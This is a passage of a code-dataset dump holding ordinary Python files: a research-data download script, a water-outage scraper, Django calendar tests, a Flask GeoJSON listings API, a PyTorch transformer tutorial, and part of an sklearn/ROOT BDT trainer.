"name"}, {"api_name": "forms.AddCategoryForm", "line_number": 353, "usage_type": "call"}, {"api_name": "django.shortcuts.render", "line_number": 354, "usage_type": "call"}, {"api_name": "django.shortcuts.redirect", "line_number": 356, "usage_type": "call"}, {"api_name": "django.contrib.auth.decorators.login_required", "line_number": 342, "usage_type": "name"}, {"api_name": "django.shortcuts.get_object_or_404", "line_number": 359, "usage_type": "call"}, {"api_name": "models.Category", "line_number": 359, "usage_type": "argument"}, {"api_name": "django.shortcuts.render", "line_number": 360, "usage_type": "call"}, {"api_name": "django.shortcuts.get_object_or_404", "line_number": 365, "usage_type": "call"}, {"api_name": "models.Category", "line_number": 365, "usage_type": "argument"}, {"api_name": "models.Product.objects.filter", "line_number": 366, "usage_type": "call"}, {"api_name": "models.Product", "line_number": 367, "usage_type": "argument"}, {"api_name": "models.Product.objects", "line_number": 366, "usage_type": "attribute"}, {"api_name": "models.Product", "line_number": 366, "usage_type": "name"}, {"api_name": "models.Category.objects.get", "line_number": 367, "usage_type": "call"}, {"api_name": "models.Category.objects", "line_number": 367, "usage_type": "attribute"}, {"api_name": "models.Category", "line_number": 367, "usage_type": "name"}, {"api_name": "django.http.JsonResponse", "line_number": 369, 
"usage_type": "call"}, {"api_name": "django.shortcuts.get_object_or_404", "line_number": 375, "usage_type": "call"}, {"api_name": "models.Product", "line_number": 375, "usage_type": "argument"}, {"api_name": "django.http.JsonResponse", "line_number": 385, "usage_type": "call"}, {"api_name": "django.contrib.auth.decorators.login_required", "line_number": 372, "usage_type": "name"}, {"api_name": "django.shortcuts.get_object_or_404", "line_number": 392, "usage_type": "call"}, {"api_name": "models.Product", "line_number": 392, "usage_type": "argument"}, {"api_name": "django.contrib.messages.success", "line_number": 396, "usage_type": "call"}, {"api_name": "django.contrib.messages", "line_number": 396, "usage_type": "name"}, {"api_name": "django.http.JsonResponse", "line_number": 397, "usage_type": "call"}, {"api_name": "django.contrib.auth.decorators.login_required", "line_number": 388, "usage_type": "name"}, {"api_name": "apps.vendor.forms.ProductForm", "line_number": 404, "usage_type": "call"}, {"api_name": "django.utils.text.slugify", "line_number": 411, "usage_type": "call"}, {"api_name": "decimal.Decimal", "line_number": 413, "usage_type": "call"}, {"api_name": "django.shortcuts.redirect", "line_number": 417, "usage_type": "call"}, {"api_name": "apps.vendor.forms.ProductForm", "line_number": 419, "usage_type": "call"}, {"api_name": "django.shortcuts.render", "line_number": 420, "usage_type": "call"}, {"api_name": "django.contrib.auth.decorators.login_required", "line_number": 400, "usage_type": "name"}, {"api_name": "forms.AddCategoryForm", "line_number": 426, "usage_type": "call"}, {"api_name": "models.Category.objects.create", "line_number": 431, "usage_type": "call"}, {"api_name": "models.Category.objects", "line_number": 431, "usage_type": "attribute"}, {"api_name": "models.Category", "line_number": 431, "usage_type": "name"}, {"api_name": "forms.AddCategoryForm", "line_number": 433, "usage_type": "call"}, {"api_name": "django.shortcuts.render", "line_number": 434, "usage_type": "call"}, {"api_name": "django.shortcuts.redirect", "line_number": 436, "usage_type": "call"}, {"api_name": "django.contrib.auth.decorators.login_required", "line_number": 422, "usage_type": "name"}]}
+{"seq_id": "73946671847", "text": "import argparse\nimport pathlib\nimport shutil\nimport urllib.request\nimport tarfile\nimport tempfile\nimport time\n\nglobal start_time\n\n\ndef progress(count, block_size, total_size):\n global start_time\n if count == 0:\n start_time = time.time()\n return\n duration = time.time() - start_time\n progress_size = int(count * block_size)\n speed = int(progress_size / (1024 * duration))\n percent = int(count * block_size * 100 / total_size)\n print(\"%d%%, %d MB, %d KB/s, total time: %d seconds\" % (percent, progress_size / (1024 * 1024), speed, duration), end=\"\\r\")\n\n\ndef unpack(tarname: pathlib.Path, destination: pathlib.Path):\n # recursive function to unpack all tar.gz files in a directory\n print(\"unpacking \", tarname, destination)\n if tarname.suffixes != [\".tar\", \".gz\"]:\n # stop if this is not a compressed directory\n return\n tar = tarfile.open(tarname, \"r:gz\")\n tar.extractall(path=destination)\n tar.close()\n\n # for each file in destination: call unpack again\n outdir = destination / tarname.name.replace(\".tar.gz\", \"\")\n\n for file in outdir.iterdir():\n unpack(file, outdir)\n\n\ndef move_and_unpack_data(tmpdir: pathlib.Path, src_dir: str, filename: str, unpack_data: bool):\n data_src = tmpdir / src_dir / filename\n data_dst = pathlib.Path(\".\")\n shutil.copy(data_src, data_dst)\n\n if unpack_data:\n unpack(data_dst / filename, data_dst.parent)\n\n\nif __name__ == \"__main__\":\n parser = argparse.ArgumentParser()\n parser.add_argument(\n \"--unpack\",\n help=\"If set, unpack all compressed subdirectories as well. This will require approx. 30 GB of disk space.\",\n action=\"store_true\"\n )\n\n unpack_data = parser.parse_args().unpack\n download_path = \"https://cme.h-its.org/exelixis/material/simulation_study.tar.gz\"\n\n with tempfile.TemporaryDirectory() as tmpdir:\n print(\"Downloading data from \", download_path)\n filename, _ = urllib.request.urlretrieve(url=download_path, reporthook=progress)\n\n print(\"\\nUnpacking data\")\n tar = tarfile.open(filename, \"r:gz\")\n tar.extractall(path=tmpdir)\n tar.close()\n\n tmpdir = pathlib.Path(tmpdir)\n move_and_unpack_data(tmpdir=tmpdir, src_dir=\"supplementary_data\", filename=\"input_data.tar.gz\", unpack_data=unpack_data)\n move_and_unpack_data(tmpdir=tmpdir, src_dir=\"supplementary_data/GBT\", filename=\"dataframes.tar.gz\", unpack_data=unpack_data)\n move_and_unpack_data(tmpdir=tmpdir, src_dir=\"supplementary_data/GBT\", filename=\"training_results.tar.gz\", unpack_data=unpack_data)\n", "repo_name": "tschuelia/SimulationStudy", "sub_path": "download_data.py", "file_name": "download_data.py", "file_ext": "py", "file_size_in_byte": 2600, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "53", "api": [{"api_name": "time.time", "line_number": 15, "usage_type": "call"}, {"api_name": "time.time", "line_number": 17, "usage_type": "call"}, {"api_name": "pathlib.Path", "line_number": 24, "usage_type": "attribute"}, {"api_name": "tarfile.open", "line_number": 30, "usage_type": "call"}, {"api_name": "pathlib.Path", "line_number": 41, "usage_type": "attribute"}, {"api_name": "pathlib.Path", "line_number": 43, "usage_type": "call"}, {"api_name": "shutil.copy", "line_number": 44, "usage_type": "call"}, {"api_name": "argparse.ArgumentParser", "line_number": 51, "usage_type": "call"}, {"api_name": "tempfile.TemporaryDirectory", "line_number": 61, "usage_type": "call"}, {"api_name": "urllib.request.request.urlretrieve", "line_number": 
63, "usage_type": "call"}, {"api_name": "urllib.request.request", "line_number": 63, "usage_type": "attribute"}, {"api_name": "urllib.request", "line_number": 63, "usage_type": "name"}, {"api_name": "tarfile.open", "line_number": 66, "usage_type": "call"}, {"api_name": "pathlib.Path", "line_number": 70, "usage_type": "call"}]}
+{"seq_id": "5948266579", "text": "from datetime import datetime\nfrom urllib.parse import urljoin\nfrom app.scrapers.base import AbstractProvider\n\n\n# TODO: unify scrapping and parsing\n\nclass GWP(AbstractProvider):\n \"\"\"GWP water provider class\"\"\"\n\n TYPE = 'water'\n ROOT_URL = 'https://www.gwp.ge'\n URLS = [\n {\"url\": urljoin(ROOT_URL, '/ka/dagegmili'), \"emergency\": False},\n {\"url\": urljoin(ROOT_URL, '/ka/gadaudebeli'), \"emergency\": True}\n ]\n\n async def scrap_notifications(self) -> list:\n \"\"\"Scraps notifications based on their type from webpage\"\"\"\n\n notifications = []\n\n for item in self.URLS:\n url = item.get(\"url\")\n emergency = item.get(\"emergency\")\n soup = await self.request_soup(url)\n outages_table = soup.find(\"table\", {\"class\": \"samushaoebi\"})\n outages_blocks = outages_table.find_all('tr')\n\n for item in outages_blocks:\n date = datetime.strptime(item.find(\"span\", {\"style\": \"color:#f00000\"}).text, \"%d/%m/%Y\")\n\n if date >= datetime.now().replace(hour=0, minute=0, second=0, microsecond=0):\n title = item.find_all(\"a\")[1].get_text(strip=True)\n link = urljoin(self.ROOT_URL, item.a.get(\"href\"))\n notifications.append(\n {\n \"type\": self.TYPE,\n \"date\": date.strftime(\"%Y-%m-%d\"),\n \"title\": title,\n \"emergency\": emergency,\n \"link\": link,\n }\n )\n\n return notifications\n\n async def parse_notifications_info(self, notifications: list) -> list: # noqa: C901\n \"\"\"Parses info from notifications\"\"\"\n\n notifications_info = []\n\n for notification in notifications:\n\n url = notification.get('link')\n soup = await self.request_soup(url)\n\n type = notification.get(\"type\")\n date = notification.get('date')\n title = notification.get('title')\n\n emergency = notification.get(\"emergency\")\n\n # For emergency outages\n\n if emergency:\n outage_text = soup.css.select(\".initial > ul > li > p\")\n for i in outage_text:\n if i.get_text(strip=True) != '':\n info = i.get_text(strip=True).replace(\"\\xa0\", \" \")\n notifications_info.append(\n {\n 'date': date,\n 'type': type,\n 'emergency': emergency,\n 'title': title,\n 'info': info\n }\n )\n # For planned outages\n\n else:\n outage_text = soup.css.select(\".news-details > p\")\n temp = []\n for i in outage_text:\n if i.get_text(strip=True) != '':\n temp.append(i.get_text(strip=True).replace(\"\\xa0\", \" \"))\n\n info = \"\".join(temp[1:-2])\n notifications_info.append(\n {\n 'date': date,\n 'type': type,\n 'emergency': emergency,\n 'title': title,\n 'info': info\n }\n )\n\n return notifications_info\n", "repo_name": "roaddust2/outages-ge-bot", "sub_path": "app/scrapers/gwp.py", "file_name": "gwp.py", "file_ext": "py", "file_size_in_byte": 3524, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "53", "api": [{"api_name": "app.scrapers.base.AbstractProvider", "line_number": 8, "usage_type": "name"}, {"api_name": "urllib.parse.urljoin", "line_number": 14, "usage_type": "call"}, {"api_name": "urllib.parse.urljoin", "line_number": 15, "usage_type": "call"}, {"api_name": "datetime.datetime.strptime", "line_number": 31, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 31, "usage_type": "name"}, {"api_name": "datetime.datetime.now", "line_number": 33, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 33, "usage_type": "name"}, {"api_name": "urllib.parse.urljoin", "line_number": 35, "usage_type": "call"}]}
+{"seq_id": "14196435929", "text": "from django.test import TestCase\nfrom django.utils import timezone\nfrom util.factories import CalendarFactory, EventFactory\n\n\nclass CalendarTestCase(TestCase):\n\n def setUp(self):\n self.calendar = CalendarFactory()\n self.profile = self.calendar.owner\n\n def test_default(self):\n # Ensure default calendar exists when user profile is created\n self.assertIsNotNone(self.calendar)\n\n # Test the default values of the calendar are correct\n self.assertEqual(self.calendar.owner, self.profile)\n self.assertEqual(self.calendar.privacy, 0)\n self.assertEqual(str(self.calendar),\n str(self.profile) + ' -> ' + self.calendar.title)\n\n def test_create(self):\n # Valid data for calendar creation\n data = {\n 'owner': self.profile,\n 'title': 'Personal',\n 'color': '#420BAE',\n 'privacy': 420\n }\n\n # Create the calendar with the given data\n calendar = CalendarFactory(\n owner=data['owner'],\n title=data['title'],\n color=data['color'],\n privacy=data['privacy']\n )\n\n # Try accessing all the fields, ensure they're correct\n for field in data:\n self.assertEqual(data[field], getattr(calendar, field))\n\n\nclass EventTestCase(TestCase):\n\n def setUp(self):\n self.calendar = CalendarFactory()\n self.profile = self.calendar.owner\n\n def test_create(self):\n # Valid data for an event\n data = {\n 'calendar': self.calendar,\n 'title': \"JoJo's Bizarre Adventure\",\n 'start': timezone.now(),\n 'end': timezone.now() + timezone.timedelta(hours=5),\n 'location': 'Great Britain',\n 'description': \"JoJo's Bizarre Adventure tells the story of \"\n \"the Joestar family, a family whose various members \"\n \"discover they are destined to take down supernatural \"\n \"foes using unique powers that they find they possess.\"\n }\n\n # Create the event\n event = EventFactory(\n calendar=data['calendar'],\n title=data['title'],\n start=data['start'],\n end=data['end'],\n location=data['location'],\n description=data['description'],\n )\n\n # Try accessing all the fields, ensure they're correct\n for field in data:\n self.assertEqual(data[field], getattr(event, field))\n\n # Serialize the event\n serialized_data = event.serialize()\n\n # Ensure serialized data is correct\n for field in data:\n # Start and end times should be formatted\n if field == 'start':\n self.assertEqual(event.start.strftime('%Y-%m-%dT%H:%M:%S'),\n serialized_data[field])\n elif field == 'end':\n self.assertEqual(event.end.strftime('%Y-%m-%dT%H:%M:%S'),\n serialized_data[field])\n elif field == 'calendar':\n pass\n else:\n self.assertEqual(getattr(event, field), serialized_data[field])\n\n # Test unicode representation\n self.assertEqual(\n \"%s -> %s : %s -> %s\" % (event.calendar, event.title, event.start, event.end,),\n unicode(event)\n )\n\n def test_interval(self):\n event = EventFactory()\n interval = event.as_interval\n self.assertEqual(event.start, interval.start)\n self.assertEqual(event.end, interval.end)\n\n def test_happens_when(self):\n now = timezone.now()\n onehr = timezone.timedelta(hours=1)\n\n # Test in range\n inrange = EventFactory(\n start=now - onehr,\n end=now + onehr,\n )\n self.assertTrue(inrange.happens_when(now))\n\n # Test before\n before = EventFactory(\n start=now - 2 * onehr,\n end=now - onehr,\n )\n self.assertFalse(before.happens_when(now))\n\n # Test edge before\n before = EventFactory(\n start=now - onehr,\n end=now,\n )\n self.assertFalse(before.happens_when(now))\n\n # Test after\n before = EventFactory(\n start=now + onehr,\n end=now + 2 * onehr,\n )\n 
self.assertFalse(before.happens_when(now))\n\n # Test edge after\n before = EventFactory(\n start=now,\n end=now + onehr,\n )\n self.assertFalse(before.happens_when(now))\n", "repo_name": "sudo-woodo/hitmeup", "sub_path": "ourcalendar/tests/test_models.py", "file_name": "test_models.py", "file_ext": "py", "file_size_in_byte": 4612, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 6, "dataset": "github-code", "pt": "53", "api": [{"api_name": "django.test.TestCase", "line_number": 6, "usage_type": "name"}, {"api_name": "util.factories.CalendarFactory", "line_number": 9, "usage_type": "call"}, {"api_name": "util.factories.CalendarFactory", "line_number": 32, "usage_type": "call"}, {"api_name": "django.test.TestCase", "line_number": 44, "usage_type": "name"}, {"api_name": "util.factories.CalendarFactory", "line_number": 47, "usage_type": "call"}, {"api_name": "django.utils.timezone.now", "line_number": 55, "usage_type": "call"}, {"api_name": "django.utils.timezone", "line_number": 55, "usage_type": "name"}, {"api_name": "django.utils.timezone.now", "line_number": 56, "usage_type": "call"}, {"api_name": "django.utils.timezone", "line_number": 56, "usage_type": "name"}, {"api_name": "django.utils.timezone.timedelta", "line_number": 56, "usage_type": "call"}, {"api_name": "util.factories.EventFactory", "line_number": 65, "usage_type": "call"}, {"api_name": "util.factories.EventFactory", "line_number": 102, "usage_type": "call"}, {"api_name": "django.utils.timezone.now", "line_number": 108, "usage_type": "call"}, {"api_name": "django.utils.timezone", "line_number": 108, "usage_type": "name"}, {"api_name": "django.utils.timezone.timedelta", "line_number": 109, "usage_type": "call"}, {"api_name": "django.utils.timezone", "line_number": 109, "usage_type": "name"}, {"api_name": "util.factories.EventFactory", "line_number": 112, "usage_type": "call"}, {"api_name": "util.factories.EventFactory", "line_number": 119, "usage_type": "call"}, {"api_name": "util.factories.EventFactory", "line_number": 126, "usage_type": "call"}, {"api_name": "util.factories.EventFactory", "line_number": 133, "usage_type": "call"}, {"api_name": "util.factories.EventFactory", "line_number": 140, "usage_type": "call"}]}
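Two observations on the test_models.py record above. First, the unicode(...) call marks it as Python 2-era code; under Python 3 the representation check would call str(event). Second, the edge-case tests assert that an event does not "happen" at its own start or end, so the implied Event.happens_when (defined elsewhere in that repo) treats the interval as open on both sides. A self-contained sketch of that implied semantics:

from dataclasses import dataclass
from datetime import datetime, timedelta

@dataclass
class Interval:
    start: datetime
    end: datetime

    def happens_when(self, t: datetime) -> bool:
        # Open on both ends: the boundary instants themselves return False,
        # matching the archived edge-case assertions.
        return self.start < t < self.end

now = datetime.now()
assert Interval(now - timedelta(hours=1), now + timedelta(hours=1)).happens_when(now)
assert not Interval(now, now + timedelta(hours=1)).happens_when(now)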
+{"seq_id": "36953897908", "text": "import os\nimport dumper\nfrom flask import Flask, jsonify, request\nfrom flask.ext.sqlalchemy import SQLAlchemy\nfrom geojson import Feature, Point, FeatureCollection\n\napp = Flask(__name__)\napp.config['SQLALCHEMY_DATABASE_URI'] = os.environ['DATABASE_URL']\ndb = SQLAlchemy(app)\ndb.reflect()\n\nclass Listing(db.Model):\n __tablename__ = 'listings'\n\nfeat_props= (\"id\", \"price\", \"street\", \"status\", \"bedrooms\", \"bathrooms\", \"sq_ft\")\n\n@app.route('/')\ndef hello():\n return \"Hello World!\"\n\n@app.route('/listings')\ndef listings():\n l_query= Listing.query\n min_price= request.args.get('min_price', type=int)\n if min_price is not None:\n l_query= l_query.filter(Listing.price >= min_price)\n max_price= request.args.get('max_price', type=int)\n if max_price is not None:\n l_query= l_query.filter(Listing.price <= max_price)\n\n min_bed= request.args.get('min_bed', type=int)\n if min_bed is not None:\n l_query= l_query.filter(Listing.bedrooms >= min_bed)\n max_bed= request.args.get('max_bed', type=int)\n if max_bed is not None:\n l_query= l_query.filter(Listing.bedrooms <= max_bed)\n\n min_bath= request.args.get('min_bath', type=int)\n if min_bath is not None:\n l_query= l_query.filter(Listing.bathrooms >= min_bath)\n max_bath= request.args.get('max_bath', type=int)\n if max_bath is not None:\n l_query= l_query.filter(Listing.bathrooms <= max_bath)\n\n features= list()\n for entry in l_query.all():\n feature = Feature(geometry=Point((entry.long, entry.lat)))\n feature.properties= {k:getattr(entry, k) for k in feat_props}\n features.append(feature)\n \n retcode= jsonify(FeatureCollection(features))\n return(retcode)\n\nif __name__ == '__main__':\n app.run()\n", "repo_name": "leed25d/od_listings", "sub_path": "app.py", "file_name": "app.py", "file_ext": "py", "file_size_in_byte": 1759, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "53", "api": [{"api_name": "flask.Flask", "line_number": 7, "usage_type": "call"}, {"api_name": "os.environ", "line_number": 8, "usage_type": "attribute"}, {"api_name": "flask.ext.sqlalchemy.SQLAlchemy", "line_number": 9, "usage_type": "call"}, {"api_name": "flask.request.args.get", "line_number": 24, "usage_type": "call"}, {"api_name": "flask.request.args", "line_number": 24, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 24, "usage_type": "name"}, {"api_name": "flask.request.args.get", "line_number": 27, "usage_type": "call"}, {"api_name": "flask.request.args", "line_number": 27, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 27, "usage_type": "name"}, {"api_name": "flask.request.args.get", "line_number": 31, "usage_type": "call"}, {"api_name": "flask.request.args", "line_number": 31, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 31, "usage_type": "name"}, {"api_name": "flask.request.args.get", "line_number": 34, "usage_type": "call"}, {"api_name": "flask.request.args", "line_number": 34, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 34, "usage_type": "name"}, {"api_name": "flask.request.args.get", "line_number": 38, "usage_type": "call"}, {"api_name": "flask.request.args", "line_number": 38, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 38, "usage_type": "name"}, {"api_name": "flask.request.args.get", "line_number": 41, "usage_type": "call"}, {"api_name": "flask.request.args", "line_number": 41, "usage_type": "attribute"}, 
{"api_name": "flask.request", "line_number": 41, "usage_type": "name"}, {"api_name": "geojson.Feature", "line_number": 47, "usage_type": "call"}, {"api_name": "geojson.Point", "line_number": 47, "usage_type": "call"}, {"api_name": "flask.jsonify", "line_number": 51, "usage_type": "call"}, {"api_name": "geojson.FeatureCollection", "line_number": 51, "usage_type": "call"}]}
+{"seq_id": "74773847527", "text": "# See [video](https://youtu.be/kCc8FmEb1nY)\n# The colab repo is [here](https://colab.research.google.com/drive/1JMLa53HDuA-i7ZBmqV7ZnA3c_fvtXnx-?usp=sharing)\n\nimport time\nfrom pathlib import Path\n\nimport torch\nfrom torch.utils.data import DataLoader \nfrom tqdm import tqdm\n\nfrom config import get_config, get_device, get_model_folder\nfrom dataset8 import get_ds8, get_testing_ds8, Dataset8\nfrom model8 import Transformer8, build_transformer8\nfrom utils import reload_model, save_model, load_trained_model\n\n\ndef build_model8(config: dict, vocab_tgt_len: int) -> Transformer8:\n model = build_transformer8(vocab_tgt_len,\n d_model=config['d_model'], N=config['N'], h=config['h'], block_size=config['block_size'], dropout=config['dropout'], d_ff=config['d_ff'])\n return model\n\n\ndef train_model8(config: dict):\n # hyperparameters\n max_iters = 5000\n eval_interval = 100\n eval_iters = 200\n total_loss = 0\n initial_epoch = 0\n global_step = 0\n\n torch.manual_seed(1337)\n\n device = get_device()\n\n model_folder = get_model_folder(config)\n Path(model_folder).mkdir(parents=True, exist_ok=True)\n\n train_dataloader, val_dataloader, tokenizer_tgt, train_ds, val_ds = get_ds8(config, model_folder)\n transformer = build_model8(config, tokenizer_tgt.get_vocab_size()).to(device)\n\n # print the number of parameters in the model\n print(sum(p.numel() for p in transformer.parameters())/1e6, 'M parameters')\n\n # create a PyTorch optimizer\n optimizer = torch.optim.AdamW(transformer.parameters(), lr=config['lr'])\n\n transformer, initial_epoch, optimizer, global_step = reload_model(\n config, transformer, optimizer, initial_epoch, global_step)\n\n for epoch in range(initial_epoch, config['num_epochs']):\n if (device == 'cuda'):\n torch.cuda.empty_cache()\n\n transformer.train() # moved inside for run_validation at each step\n\n batch_iterator = tqdm(train_dataloader, desc=f'Processing epoch {epoch:02d}')\n # for iter, batch in enumerate(batch_iterator):\n # if (iter == max_iters):\n # break\n for iter in range(max_iters):\n\n # every once in a while evaluate the loss on train and val sets\n if (iter % eval_interval == 0 or iter == max_iters - 1) and (iter > 0):\n losses = evaluate_model8(transformer, val_dataloader, eval_iters, device, train_ds, val_ds)\n batch_iterator.write(f\"step {iter}: train loss {losses['train']:.4f}, val loss {losses['val']:.4f}\")\n\n # sample a batch of data\n # xb, yb = batch\n xb, yb = train_ds.get_batch()\n\n # evaluate the loss\n logits, loss = transformer(xb.to(device), yb.to(device))\n optimizer.zero_grad(set_to_none=True)\n loss.backward()\n optimizer.step()\n\n # Save the model at the end of every epoch\n save_model(config, transformer, optimizer, epoch, global_step)\n\n\n # generate from the model\n context = torch.zeros((1, 1), dtype=torch.long, device=device)\n print(tokenizer_tgt.decode(transformer.generate(context, max_new_tokens=2000)[0].tolist()))\n\n\n@torch.no_grad()\ndef evaluate_model8(transformer: Transformer8, val_dataloader: DataLoader, eval_iters: int, device, train_ds: Dataset8, val_ds: Dataset8):\n\n out = {'train':0, 'val': 0}\n transformer.eval()\n\n tmp = {'train':train_ds, 'val': val_ds}\n for key, value in tmp.items():\n losses = torch.zeros(eval_iters)\n for k in range(eval_iters):\n X, Y = value.get_batch()\n logits, loss = transformer(X.to(device), Y.to(device))\n losses[k] = loss.item()\n out[key] = losses.mean()\n\n # losses = torch.zeros(eval_iters)\n # for k, batch in enumerate(val_dataloader):\n 
# if k == eval_iters:\n # break\n # X, Y = batch\n # logits, loss = transformer(X.to(device), Y.to(device))\n # losses[k] = loss.item()\n # out['val'] = losses.mean()\n\n transformer.train()\n return out\n\ndef translate8(config: dict, sentence: str):\n device = get_device()\n\n model_folder = get_model_folder(config)\n if not Path.exists(Path(model_folder)):\n raise ValueError(f\"{model_folder} model_folder does not exist\")\n\n tokenizer = get_testing_ds8(config, model_folder)\n model = build_model8(config, tokenizer.get_vocab_size()).to(device)\n\n # Load the pretrained weights\n model = load_trained_model(config, model)\n\n # generate from the model\n context = torch.zeros((1, 1), dtype=torch.long, device=device)\n print(tokenizer.decode(model.generate(context, max_new_tokens=2000)[0].tolist()))\n\ndef debug_code_model8(config: dict, device):\n config['model'] = \"model7\"\n config['datasource'] = \"translate\"\n config['lang_src'] = \"en\"\n config['lang_tgt'] = \"fr\"\n\n model_folder = get_model_folder(config)\n Path(model_folder).mkdir(parents=True, exist_ok=True)\n\n train_dataloader, val_dataloader, test_dataloader, tokenizer_tgt, train_ds, val_ds = get_ds8(config, model_folder)\n model = build_model8(config, tokenizer_tgt.get_vocab_size()).to(device)\n\n print(model)\n model.train()\n\n\nif __name__ == '__main__':\n # warnings.filterwarnings('ignore')\n config = get_config()\n device = get_device()\n debug_code_model8(config, device)\n", "repo_name": "prorates/pytorch-transformer-tutorials", "sub_path": "tutorial8.py", "file_name": "tutorial8.py", "file_ext": "py", "file_size_in_byte": 5361, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "53", "api": [{"api_name": "model8.build_transformer8", "line_number": 18, "usage_type": "call"}, {"api_name": "model8.Transformer8", "line_number": 17, "usage_type": "name"}, {"api_name": "torch.manual_seed", "line_number": 32, "usage_type": "call"}, {"api_name": "config.get_device", "line_number": 34, "usage_type": "call"}, {"api_name": "config.get_model_folder", "line_number": 36, "usage_type": "call"}, {"api_name": "pathlib.Path", "line_number": 37, "usage_type": "call"}, {"api_name": "dataset8.get_ds8", "line_number": 39, "usage_type": "call"}, {"api_name": "torch.optim.AdamW", "line_number": 46, "usage_type": "call"}, {"api_name": "torch.optim", "line_number": 46, "usage_type": "attribute"}, {"api_name": "utils.reload_model", "line_number": 48, "usage_type": "call"}, {"api_name": "torch.cuda.empty_cache", "line_number": 53, "usage_type": "call"}, {"api_name": "torch.cuda", "line_number": 53, "usage_type": "attribute"}, {"api_name": "tqdm.tqdm", "line_number": 57, "usage_type": "call"}, {"api_name": "utils.save_model", "line_number": 79, "usage_type": "call"}, {"api_name": "torch.zeros", "line_number": 83, "usage_type": "call"}, {"api_name": "torch.long", "line_number": 83, "usage_type": "attribute"}, {"api_name": "model8.Transformer8", "line_number": 88, "usage_type": "name"}, {"api_name": "torch.utils.data.DataLoader", "line_number": 88, "usage_type": "name"}, {"api_name": "dataset8.Dataset8", "line_number": 88, "usage_type": "name"}, {"api_name": "torch.zeros", "line_number": 95, "usage_type": "call"}, {"api_name": "torch.no_grad", "line_number": 87, "usage_type": "call"}, {"api_name": "config.get_device", "line_number": 115, "usage_type": "call"}, {"api_name": "config.get_model_folder", "line_number": 117, "usage_type": "call"}, {"api_name": "pathlib.Path.exists", "line_number": 
118, "usage_type": "call"}, {"api_name": "pathlib.Path", "line_number": 118, "usage_type": "name"}, {"api_name": "dataset8.get_testing_ds8", "line_number": 121, "usage_type": "call"}, {"api_name": "utils.load_trained_model", "line_number": 125, "usage_type": "call"}, {"api_name": "torch.zeros", "line_number": 128, "usage_type": "call"}, {"api_name": "torch.long", "line_number": 128, "usage_type": "attribute"}, {"api_name": "config.get_model_folder", "line_number": 137, "usage_type": "call"}, {"api_name": "pathlib.Path", "line_number": 138, "usage_type": "call"}, {"api_name": "dataset8.get_ds8", "line_number": 140, "usage_type": "call"}, {"api_name": "config.get_config", "line_number": 149, "usage_type": "call"}, {"api_name": "config.get_device", "line_number": 150, "usage_type": "call"}]}
+{"seq_id": "20276449246", "text": "import pickle\n\nfrom sklearn.ensemble import AdaBoostClassifier\n\nimport ROOT\nimport PyAnalysisTools.PlottingUtils.PlottingTools as PT\nimport PyAnalysisTools.PlottingUtils.Formatting as FT\nimport PyAnalysisTools.PlottingUtils.Formatting as FM\nfrom PyAnalysisTools.AnalysisTools.MLHelper import TrainingReader, MLTrainConfig\nfrom PyAnalysisTools.base import InvalidInputError\nfrom PyAnalysisTools.base.OutputHandle import OutputFileHandle\nfrom PyAnalysisTools.base.FileHandle import FileHandle\nfrom PyAnalysisTools.PlottingUtils.PlotConfig import PlotConfig as pc\nfrom PyAnalysisTools.AnalysisTools.StatisticsTools import get_KS\nfrom PyAnalysisTools.base.ShellUtils import copy\nfrom PyAnalysisTools.base.YAMLHandle import YAMLLoader as yl\n\n\nclass BDTConfig(object):\n def __init__(self, **kwargs):\n kwargs.setdefault('num_layers', 4)\n for k, v in kwargs.items():\n setattr(self, k.lower(), v)\n\n\nclass SklearnBDTTrainer(object):\n def __init__(self, **kwargs):\n kwargs.setdefault('output_path', './')\n self.train_cfg = MLTrainConfig(**yl.read_yaml(kwargs['training_config_file']))\n self.bdt_cfg = BDTConfig(**yl.read_yaml(kwargs['bdt_config_file']))\n if 'variables' in kwargs:\n self.variable_list = kwargs['variables']\n elif 'var_list' in kwargs:\n self.variable_list = yl.read_yaml(kwargs['var_list'])['inputs']\n # copy(kwargs['var_list'], os.path.join(kwargs['output_path'], 'var_list.yml'))\n else:\n self.variable_list = None\n self.reader = TrainingReader(**kwargs)\n self.signal_df = None\n self.bkg_df = None\n self.labels = None\n for k, v in kwargs.items():\n setattr(self, k.lower(), v)\n\n def load_train_data(self):\n self.signal_df, self.bkg_df, self.labels = self.reader.prepare_data(self.train_cfg,\n variable_list=self.variable_list)\n\n def train_bdt(self):\n clf = AdaBoostClassifier()\n X_train, y_train, X_test, y_test = self.reader.pre_process_data(self.signal_df, self.bkg_df, self.labels,\n self.train_cfg, self.output_path)\n clf.fit(X_train, y_train)\n with open('test.pkl', 'wb') as f:\n pickle.dump(clf, f)\n\n\nclass BDTAnalyser(object):\n def __init__(self, **kwargs):\n if \"input_files\" not in kwargs:\n raise InvalidInputError(\"No input files provided\")\n kwargs.setdefault(\"output_path\", \"./\")\n self.file_handles = [FileHandle(file_name=file_name) for file_name in kwargs[\"input_files\"]]\n self.output_handle = OutputFileHandle(output_dir=kwargs[\"output_path\"])\n for arg, val in kwargs.iteritems():\n if not hasattr(self, arg):\n setattr(self, arg, val)\n ROOT.gROOT.SetBatch(True)\n\n def analyse(self):\n \"\"\"\n Main entry point to perform BDT analysis\n \"\"\"\n self.analyse_train_variables()\n self.perform_overtraining_check()\n self.perform_correlation_analysis()\n self.analyse_roc_curves()\n self.output_handle.write_and_close()\n\n def perform_overtraining_check(self):\n for file_handle in self.file_handles:\n self.analyse_overtraining(file_handle)\n\n def analyse_train_variables(self):\n for file_handle in self.file_handles:\n self.plot_train_variables(file_handle)\n\n def plot_train_variables(self, file_handle):\n def classify():\n variables = {}\n for signal_hist in signal_hists:\n variables[signal_hist.GetName().replace(\"__Signal\", \"\")] = [signal_hist]\n for background_hist in background_hists:\n variables[background_hist.GetName().replace(\"__Background\", \"\")].append(background_hist)\n return variables\n\n signal_hists = 